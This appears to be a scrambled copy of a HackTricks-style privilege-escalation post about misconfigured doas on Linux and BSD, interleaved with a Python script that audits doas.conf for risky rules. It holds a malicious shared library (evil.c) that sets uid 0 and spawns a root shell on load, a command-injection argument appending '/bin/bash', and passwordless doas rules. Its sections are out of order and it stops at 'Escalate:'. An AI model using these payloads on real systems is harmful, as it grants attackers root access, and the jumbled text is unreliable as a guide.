Hacktricks Doas Info

```bash
./script.sh "test; /bin/bash"
```

```
permit persist user1 as root
```

Once you run `doas -n id` with a password once, subsequent commands don’t need a password for a few minutes.

— HackTricks

Want more? Check out the HackTricks Linux Privilege Escalation guide for deeper dives.

```c
// evil.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

// The constructor attribute makes init() run as soon as the object is loaded.
__attribute__((constructor)) void init() {
    setuid(0);
    setgid(0);
    system("/bin/bash");
}
```

If you’ve spent any time on BSD or modern Linux systems (like Alpine), you’ve probably seen doas lurking in the shadows. It’s the leaner, meaner cousin of sudo — simpler config, fewer CVEs, and still dangerous if misconfigured.

```
permit nopass user1 as root
```

Check:

Unlike `sudo`, there’s no PAM, no plugin system, no logging madness — just permission rules.

```bash
which doas
command -v doas
doas -V
```

If installed, check the config:

In this post, we’ll break down how doas works, where to find it, and how to abuse it for privilege escalation during a pentest.

doas was originally from OpenBSD. It allows users to execute commands as another user (usually root) with a minimal configuration file: `/etc/doas.conf`
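A review-side check for the rules shown on this page (`permit nopass user1 as root` and `permit persist user1 as root`), added here as an example and not part of the original post: it parses `doas.conf` rule lines and lists permit rules toward root (or any target) that use `nopass`, `persist` or `keepenv`, or that carry no `cmd` restriction. The function names and the sample rules are constructed for illustration; `keepenv`, `nolog`, `setenv` and `cmd` are doas.conf(5) keywords that the page itself does not show.

```python
import shlex

FLAGS = {  # doas.conf(5) options that weaken a rule, with the reason to report
    "nopass": "no password is required",
    "persist": "authentication is cached after the first password entry",
    "keepenv": "the caller's environment is kept for the command",
}

def parse_rule(line):
    """Return a dict for a permit/deny rule, or None for blank/comment lines."""
    toks = shlex.split(line.replace("{", " { ").replace("}", " } "), comments=True)
    if not toks or toks[0] not in ("permit", "deny"):
        return None
    rule = {"action": toks[0], "options": [], "target": None, "cmd": None}
    i = 1
    while i < len(toks):
        if toks[i] in FLAGS or toks[i] == "nolog":
            rule["options"].append(toks[i])
            i += 1
        elif toks[i] == "setenv" and "}" in toks[i:]:
            i = toks.index("}", i) + 1  # skip the setenv { ... } block
        else:
            break
    rest = toks[i:]  # identity [as target] [cmd command [args ...]]
    rule["identity"] = rest[0] if rest else None
    if rest[1:2] == ["as"] and len(rest) > 2:
        rule["target"], rest = rest[2], rest[2:]
    if rest[1:2] == ["cmd"] and len(rest) > 2:
        rule["cmd"] = rest[2]
    return rule

def audit(conf_text):
    """Yield (line_no, identity, reasons) for permit rules that need review."""
    for no, line in enumerate(conf_text.splitlines(), 1):
        rule = parse_rule(line)
        # An omitted "as" target means any target user, root included.
        if not rule or rule["action"] != "permit" or rule["target"] not in (None, "root"):
            continue
        reasons = [FLAGS[o] for o in rule["options"] if o in FLAGS]
        if rule["cmd"] is None:
            reasons.append("no cmd restriction: any command may be run")
        if reasons:
            yield no, rule["identity"], reasons

SAMPLE = """permit nopass user1 as root  # constructed sample rules
permit persist user1 as root
permit nopass backup as root cmd /usr/bin/rsync
permit keepenv setenv { PATH=/usr/bin } :wheel
deny user2
permit user3 as www cmd /usr/bin/id
"""
```

doas applies the last matching rule, so a flagged permit can still be overridden by a later `deny`; read the findings in file order.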

```bash
doas -n id
# uid=0(root) gid=0(root)
```

Escalate: